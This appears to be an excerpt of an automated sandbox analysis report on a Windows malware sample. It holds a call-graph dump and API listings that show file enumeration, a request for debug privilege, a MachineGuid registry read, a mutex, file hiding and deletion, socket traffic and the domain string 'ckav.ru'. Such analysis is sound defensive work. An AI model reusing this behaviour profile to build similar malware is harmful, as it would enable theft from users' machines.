403f6f 8957->8965 8960 403ed3 FindFirstFileW 8958->8960 8961 403dbc FindFirstFileW 8959->8961 8977 403f8d 8960->8977 8981 403ee8 8960->8981 8972 403e9c 8961->8972 8982 403dd1 8961->8982 8962 402bab 2 API calls 8962->8965 8963 402bab 2 API calls 8963->8953 8964 4031e5 4 API calls 8966 403e84 FindNextFileW 8964->8966 8965->8941 8965->8944 8967 403e96 8966->8967 8966->8982 8991 403bef 8967->8991 8968 4031e5 4 API calls 8971 403f50 FindNextFileW 8968->8971 8970 405b6f 6 API calls 8970->8981 8974 403f87 8971->8974 8971->8981 8972->8963 8973 405b6f 6 API calls 8973->8982 8975 403bef 5 API calls 8974->8975 8975->8977 8976 403f75 8978 402bab 2 API calls 8976->8978 8977->8962 8980 403f7b 8978->8980 8979 403d74 15 API calls 8979->8982 8984 403bef 5 API calls 8980->8984 8981->8968 8981->8970 8981->8976 8985 402bab 2 API 
calls 8981->8985 8994 40fa23 8981->8994 8982->8964 8982->8973 8982->8979 8983 402bab 2 API calls 8982->8983 8986 403f63 8982->8986 8983->8982 8984->8965 8985->8981 8987 402bab 2 API calls 8986->8987 8988 403f69 8987->8988 8989 403bef 5 API calls 8988->8989 8989->8965 8992 4031e5 4 API calls 8991->8992 8993 403c01 FindClose 8992->8993 8993->8972 8995 40fa39 8994->8995 8996 410293 8995->8996 8997 405b6f 6 API calls 8995->8997 8996->8981 8998 40ffcc 8997->8998 8998->8996 8999 4040bb 12 API calls 8998->8999 9000 40ffeb 8999->9000 9001 41028c 9000->9001 9003 402b7c 2 API calls 9000->9003 9049 41027d 9000->9049 9002 402bab 2 API calls 9001->9002 9002->8996 9005 41001e 9003->9005 9004 403f9e 5 API calls 9004->9001 9006 40a423 4 API calls 9005->9006 9005->9049 9007 41004a 9006->9007 9008 4031e5 4 API calls 9007->9008 9009 41005c 9008->9009 9010 4031e5 4 API calls 9009->9010 9011 410079 9010->9011 9012 4031e5 4 API calls 9011->9012 9013 410096 9012->9013 9014 4031e5 4 API calls 9013->9014 9015 4100b0 9014->9015 9016 4031e5 4 API calls 9015->9016 9017 4100cd 9016->9017 9018 4031e5 4 API calls 9017->9018 9019 4100ea 9018->9019 9050 412516 9019->9050 9021 4100fd 9022 40642c 5 API calls 9021->9022 9023 41013e 9022->9023 9024 410142 9023->9024 9025 41019f 9023->9025 9026 40488c 5 API calls 9024->9026 9028 4031e5 4 API calls 9025->9028 9027 410151 9026->9027 9029 404866 4 API calls 9027->9029 9046 41019c 9027->9046 9039 4101bb 9028->9039 9033 410163 9029->9033 9030 40642c 5 API calls 9032 410201 9030->9032 9031 41022a 9035 413a58 13 API calls 9031->9035 9037 410205 9032->9037 9038 41022f 9032->9038 9034 406c4c 6 API calls 9033->9034 9047 41018e 9033->9047 9040 410178 9034->9040 9041 41026e 9035->9041 9036 403c40 5 API calls 9036->9046 9042 4126a7 7 API calls 9037->9042 9053 4125db 9038->9053 9044 4031e5 4 API calls 9039->9044 9045 406c4c 6 API calls 9040->9045 9048 402bab 2 API calls 9041->9048 9042->9031 9044->9046 9045->9047 9046->9030 9046->9031 9047->9036 9048->9049 
9049->9004 9051 4031e5 4 API calls 9050->9051 9052 412539 9051->9052 9052->9021 9054 40488c 5 API calls 9053->9054 9055 4125ec 9054->9055 9056 4031e5 4 API calls 9055->9056 9060 41269f 9055->9060 9057 412609 9056->9057 9058 4031e5 4 API calls 9057->9058 9065 41268f 9057->9065 9061 41262a 9058->9061 9059 403c40 5 API calls 9059->9060 9060->9031 9062 412675 9061->9062 9070 4124f1 9061->9070 9063 4031e5 4 API calls 9062->9063 9063->9065 9065->9059 9067 412663 9069 4031e5 4 API calls 9067->9069 9068 4124f1 4 API calls 9068->9067 9069->9062 9071 4031e5 4 API calls 9070->9071 9072 412503 9071->9072 9072->9067 9072->9068 9259 4049dc 9260 4031e5 4 API calls 9259->9260 9261 4049ef 9260->9261 9916 40cddd 9917 405b6f 6 API calls 9916->9917 9918 40cdee 9917->9918 9919 40ce06 9918->9919 9920 413a58 13 API calls 9918->9920 9922 405b6f 6 API calls 9919->9922 9928 40ce59 9919->9928 9921 40ce00 9920->9921 9923 402bab 2 API calls 9921->9923 9924 40ce1c 9922->9924 9923->9919 9925 40ce52 9924->9925 9927 403d74 19 API calls 9924->9927 9924->9928 9926 402bab 2 API calls 9925->9926 9926->9928 9929 40ce45 9927->9929 9929->9925 9930 402bab 2 API calls 9929->9930 9930->9925 9262 40ecde 9263 412093 20 API calls 9262->9263 9264 40ecfd 9263->9264 9265 412093 20 API calls 9264->9265 9266 40ed0d 9265->9266 9270 40e8df 9271 412093 20 API calls 9270->9271 9272 40e8f8 9271->9272 9273 412093 20 API calls 9272->9273 9274 40e908 9273->9274 9281 404b22 9274->9281 9276 40e91c 9277 40e936 9276->9277 9280 40e93d 9276->9280 9288 40e944 9276->9288 9279 402bab 2 API calls 9277->9279 9279->9280 9282 402b7c 2 API calls 9281->9282 9284 404b33 9282->9284 9283 404b66 9283->9276 9284->9283 9297 4049b3 9284->9297 9287 402bab 2 API calls 9287->9283 9289 4056bf 2 API calls 9288->9289 9290 40e952 9289->9290 9291 4057df 13 API calls 9290->9291 9296 40e976 9290->9296 9292 40e966 9291->9292 9293 413aca 4 API calls 9292->9293 9294 40e970 9293->9294 9295 405695 2 API calls 9294->9295 9295->9296 9296->9277 9298 4031e5 4 API 
calls 9297->9298 9299 4049c6 9298->9299 9299->9283 9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9304 4139f7 9303->9304 9305 413866 58 API calls 9304->9305 9306 413a2d 9305->9306 9307 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9306->9307 9308 413a34 9307->9308 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 
9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10149 40ef6e 10146->10149 10150 402bab 2 API calls 10146->10150 10147 402bab GetProcessHeap HeapFree 10147->10154 10148 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10148->10154 
10151 40ef7c 10149->10151 10152 402bab 2 API calls 10149->10152 10150->10149 10151->10142 10153 402bab 2 API calls 10151->10153 10152->10151 10153->10142 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10147 10154->10148 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API 
calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10380 411d7b 10374->10380 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10379 411ed6 10378->10379 10381 405eb6 4 API calls 
10379->10381 10380->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10380->10382 10383 405eb6 4 API calls 10380->10383 10381->10363 10382->10380 10383->10380 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9707 404d04 9698->9707 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9707 9704 404b8f 5 API calls 9704->9707 9705 404a39 5 API calls 9705->9707 9706 405b6f 6 API calls 9706->9707 9707->9699 9707->9701 9707->9703 9707->9704 9707->9705 9707->9706 9708 404cbf 8 API calls 9707->9708 9709 402bab GetProcessHeap HeapFree 9707->9709 9708->9707 9709->9707 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9713 40f115 9712->9713 9715 404cbf 8 API calls 9712->9715 9714 41219c 14 API calls 9713->9714 9716 40f128 9714->9716 9717 40f0ed 9715->9717 9718 404cbf 8 API calls 9717->9718 9719 40f0fb 9718->9719 9720 413aca 4 API calls 9719->9720 9721 40f10a 9720->9721 9722 405695 2 API calls 9721->9722 9722->9713

                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID: %s\%s$%s\*$Program Files$Windows
                                • API String ID: 1690352074-2009209621
                                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3615134276-2896544425
                                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                APIs
                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                • _wmemset.LIBCMT ref: 00406244
                                • _wmemset.LIBCMT ref: 00406261
                                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wmemset$ErrorInformationLastToken
                                • String ID: IDA$IDA
                                • API String ID: 487585393-2020647798
                                • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                APIs
                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: freeaddrinfogetaddrinfosocket
                                • String ID:
                                • API String ID: 2479546573-0
                                • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AllocCreateReadVirtual
                                • String ID: .tmp
                                APIs
                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                • GetLastError.KERNEL32 ref: 0041399E
                                Similarity
                                • API ID: Error$CreateLastModeMutex
                                APIs
                                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                Similarity
                                • API ID: File$CreatePointerWrite
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                Similarity
                                • API ID: Heap$CreateFreeProcessThread_wmemset
                                • String ID: ckav.ru
                                APIs
                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                • _wmemset.LIBCMT ref: 0040634F
                                Similarity
                                • API ID: Heap$AllocateProcess_wmemset
                                • String ID: CA
                                APIs
                                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                Similarity
                                • API ID: InformationToken
                                • String ID: IDA
                                APIs
                                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                Similarity
                                • API ID: AddressProc
                                • String ID: s1@
                                APIs
                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                Similarity
                                • API ID: Heap$AllocateOpenProcessQueryValue
                                APIs
                                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                Similarity
                                • API ID: CheckMembershipToken
                                APIs
                                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                Similarity
                                • API ID: CreateDirectory
                                APIs
                                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                Similarity
                                • API ID: InfoNativeSystem
                                APIs
                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                Similarity
                                • API ID: send
                                APIs
                                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                Similarity
                                • API ID: FileMove
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                Similarity
                                • API ID: Startup
                                APIs
                                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                Similarity
                                • API ID: AttributesFile
                                APIs
                                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                Similarity
                                • API ID: Open
                                APIs
                                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                Similarity
                                • API ID: DeleteFile
                                APIs
                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                Similarity
                                • API ID: LibraryLoad
                                APIs
                                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                Similarity
                                • API ID: CloseFind
                                APIs
                                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                Similarity
                                • API ID: AttributesFile
                                APIs
                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                Similarity
                                • API ID: Close
                                APIs
                                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                Similarity
                                • API ID: ExistsFilePath
                                APIs
                                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                Similarity
                                • API ID: closesocket
                                APIs
